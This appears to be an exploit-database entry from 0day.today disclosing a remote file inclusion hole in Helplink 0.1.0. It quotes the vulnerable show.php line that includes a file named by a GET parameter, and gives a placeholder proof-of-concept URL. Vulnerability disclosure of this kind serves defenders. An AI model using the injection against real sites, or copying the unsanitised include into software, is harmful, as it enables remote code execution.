[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

helplink 0.1.0 (show.php file) Remote File Inclusion Vulnerability

Author
GoLd_M
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2165
Category
web applications
Date add
22-09-2007
Platform
unsorted
==================================================================
helplink 0.1.0 (show.php file) Remote File Inclusion Vulnerability
==================================================================



##########################################################################
# Helplink 0.1.0 (show.php file) Remote File Inclusion Vulnerability     #
# D.S : http://sourceforge.net/projects/helplink/                        #
# V.C                                                                    #
================================show.php=================================#
01 : <?                                                                  #
02 : /**                                                                 #
03 :  *      show.php - just throw some headers and footers around a file#
04 :  */                                                                 #
05 :                                                                     #
06 : include ('include.php');                                            #
07 : public_header();                                                    #
08 : include($HTTP_GET_VARS["file"]); <--- xxxx// Error !!               #
09 : public_footer();                                                    #
10 :                                                                     #
11 : ?>                                                                  #
=========================================================================#
# POC : /show.php?file=Ev!L C0D3                                         #
##########################################################################



#  0day.today [2024-12-25]  #